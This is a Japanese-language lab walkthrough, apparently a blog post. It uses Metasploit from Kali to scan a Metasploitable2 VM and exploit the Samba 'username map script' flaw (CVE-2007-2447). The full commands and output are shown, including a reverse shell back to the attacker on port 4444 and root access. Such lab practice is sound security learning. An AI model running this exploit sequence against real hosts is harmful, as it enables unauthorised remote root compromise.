Metasploit コンソールの起動
root@kali:~# service postgresql start root@kali:~# msfdb init [i] Database already started [i] The database appears to be already configured, skipping initialization root@kali:~# msfconsole ~(中略)~ =[ metasploit v5.0.38-dev ] + -- --=[ 1912 exploits - 1073 auxiliary - 329 post ] + -- --=[ 545 payloads - 45 encoders - 10 nops ] + -- --=[ 3 evasion ] msf5 >
Metasploitable2 のオープンポートを調べてみる。
msf5 > nmap -P0-65535 192.168.56.105 (← ポート番号 0 ~ 65535 を全部検索) [*] exec: nmap -P0-65536 192.168.56.105 Starting Nmap 7.70 ( https://nmap.org ) at 2019-09-08 00:40 JST Nmap scan report for 192.168.56.105 Host is up (0.00045s latency). Not shown: 977 closed ports PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh 23/tcp open telnet 25/tcp open smtp 53/tcp open domain 80/tcp open http 111/tcp open rpcbind 139/tcp open netbios-ssn 445/tcp open microsoft-ds 512/tcp open exec 513/tcp open login 514/tcp open shell 1099/tcp open rmiregistry 1524/tcp open ingreslock 2049/tcp open nfs 2121/tcp open ccproxy-ftp 3306/tcp open mysql 5432/tcp open postgresql 5900/tcp open vnc 6000/tcp open X11 6667/tcp open irc 8009/tcp open ajp13 8180/tcp open unknown MAC Address: 08:00:27:79:45:E8 (Oracle VirtualBox virtual NIC) Nmap done: 1 IP address (1 host up) scanned in 0.31 seconds
Samba によりWindowsとのファイル共有に用いられる netbios 及び microsoft directory service が動作してることが分かる。
JVNDB-2007-000374 - JVN iPedia - 脆弱性対策情報データベース
「Samba におけるコマンドインジェクションの脆弱性」
Samba にはユーザからの RPC メッセージの入力を適切に処理せず /bin/sh に渡す問題があります。結果として、遠隔の第三者により任意のコマンドを実行される可能性があります。
Metasploit で Samba に関するエクスプロイトがあるか調べる。
msf5 > search samba Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 auxiliary/admin/smb/samba_symlink_traversal normal No Samba Symlink Directory Traversal 1 auxiliary/dos/samba/lsa_addprivs_heap normal No Samba lsa_io_privilege_set Heap Overflow 2 auxiliary/dos/samba/lsa_transnames_heap normal No Samba lsa_io_trans_names Heap Overflow 3 auxiliary/dos/samba/read_nttrans_ea_list normal No Samba read_nttrans_ea_list Integer Overflow 4 auxiliary/scanner/rsync/modules_list normal Yes List Rsync Modules 5 auxiliary/scanner/smb/smb_uninit_cred normal Yes Samba _netr_ServerPasswordSet Uninitialized Credential State 6 exploit/freebsd/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (*BSD x86) 7 exploit/linux/samba/chain_reply 2010-06-16 good No Samba chain_reply Memory Corruption (Linux x86) 8 exploit/linux/samba/is_known_pipename 2017-03-24 excellent Yes Samba is_known_pipename() Arbitrary Module Load 9 exploit/linux/samba/lsa_transnames_heap 2007-05-14 good Yes Samba lsa_io_trans_names Heap Overflow 10 exploit/linux/samba/setinfopolicy_heap 2012-04-10 normal Yes Samba SetInformationPolicy AuditEventsInfo Heap Overflow 11 exploit/linux/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Linux x86) 12 exploit/multi/samba/nttrans 2003-04-07 average No Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow 13 exploit/multi/samba/usermap_script 2007-05-14 excellent No Samba "username map script" Command Execution 14 exploit/osx/samba/lsa_transnames_heap 2007-05-14 average No Samba lsa_io_trans_names Heap Overflow 15 exploit/osx/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Mac OS X PPC) 16 exploit/solaris/samba/lsa_transnames_heap 2007-05-14 average No Samba lsa_io_trans_names Heap Overflow 17 exploit/solaris/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Solaris SPARC) 18 exploit/unix/http/quest_kace_systems_management_rce 2018-05-31 excellent Yes Quest KACE Systems Management Command Injection 19 exploit/unix/misc/distcc_exec 2002-02-01 excellent Yes DistCC Daemon Command Execution 20 exploit/unix/webapp/citrix_access_gateway_exec 2010-12-21 excellent Yes Citrix Access Gateway Command Execution 21 exploit/windows/fileformat/ms14_060_sandworm 2014-10-14 excellent No MS14-060 Microsoft Windows OLE Package Manager Code Execution 22 exploit/windows/http/sambar6_search_results 2003-06-21 normal Yes Sambar 6 Search Results Buffer Overflow 23 exploit/windows/license/calicclnt_getconfig 2005-03-02 average No Computer Associates License Client GETCONFIG Overflow 24 exploit/windows/smb/group_policy_startup 2015-01-26 manual No Group Policy Script Execution From Shared Resource 25 post/linux/gather/enum_configs normal No Linux Gather Configurations
13 exploit/multi/samba/usermap_script を使ってみる。
msf5 > info exploit/multi/samba/usermap_script Name: Samba "username map script" Command Execution Module: exploit/multi/samba/usermap_script Platform: Unix Arch: cmd Privileged: Yes License: Metasploit Framework License (BSD) Rank: Excellent Disclosed: 2007-05-14 Provided by: jduckAvailable targets: Id Name -- ---- 0 Automatic Check supported: No Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target address range or CIDR identifier RPORT 139 yes The target port (TCP) Payload information: Space: 1024 Description: This module exploits a command execution vulnerability in Samba versions 3.0.20 through 3.0.25rc3 when using the non-default "username map script" configuration option. By specifying a username containing shell meta characters, attackers can execute arbitrary commands. No authentication is needed to exploit this vulnerability since this option is used to map usernames prior to authentication! References: https://cvedetails.com/cve/CVE-2007-2447/ OSVDB (34700) http://www.securityfocus.com/bid/23972 http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=534 http://samba.org/samba/security/CVE-2007-2447.html
エクスプロイトを使用する。リモートホストの設定。
msf5 > use exploit/multi/samba/usermap_script msf5 exploit(multi/samba/usermap_script) > set RHOST 192.168.56.105 RHOST => 192.168.56.105 msf5 exploit(multi/samba/usermap_script) > exploit [*] Started reverse TCP double handler on 192.168.56.106:4444 [*] Accepted the first client connection... [*] Accepted the second client connection... [*] Command: echo LobabiCRpIvAL9ia; [*] Writing to socket A [*] Writing to socket B [*] Reading from sockets... [*] Reading from socket B [*] B: "LobabiCRpIvAL9ia\r\n" [*] Matching... [*] A is input... [*] Command shell session 1 opened (192.168.56.106:4444 -> 192.168.56.105:57740) at 2019-09-08 00:54:53 +0900 id (← コマンド入力) uid=0(root) gid=0(root) uname -a (← コマンド入力) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux (← Metasploitable2 に侵入できている)
終了する。
^C (← Ctrl + C) Abort session 1? [y/N] y "" [*] 192.168.56.105 - Command shell session 1 closed. Reason: User exit msf5 exploit(multi/samba/usermap_script) > back msf5 > exit root@kali:~#